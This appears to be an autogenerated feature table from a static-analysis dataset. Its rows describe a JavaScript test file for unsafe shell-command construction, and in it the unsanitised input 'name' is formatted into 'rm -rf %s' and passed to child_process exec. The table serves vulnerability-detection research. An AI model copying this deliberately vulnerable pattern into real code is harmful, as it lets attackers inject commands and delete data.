contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:13 | util | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:13 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:13 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:13 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:20 | util.format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:20 | util.format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:20 | util.format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:20 | util.format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:20 | util.format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | exceptional return of util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | exceptional return of util.fo ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | exceptional return of util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | exceptional return of util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | exceptional return of util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:15:98:20 | format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:15:98:20 | format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:15:98:20 | format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:15:98:20 | format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:15:98:20 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:22:98:32 | "rm -rf %s" | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:35:98:38 | name | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:5:100:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:5:100:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:5:100:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:5:100:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:5:100:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:13 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:13 | util | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:13 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:13 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:13 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:20 | util.format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 